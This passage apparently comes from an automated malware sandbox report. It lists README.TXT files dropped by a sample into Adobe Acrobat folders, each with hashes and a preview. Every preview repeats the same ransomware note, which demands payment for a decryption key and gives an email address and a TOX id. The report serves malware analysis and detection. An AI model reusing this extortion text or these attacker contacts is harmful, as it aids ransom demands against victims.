                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\jquery.ui.touch-punch\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\microsoftGraph\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\2.1.15\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\libs\require\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\misc\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\activity-badge\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account-select\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\add-account\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
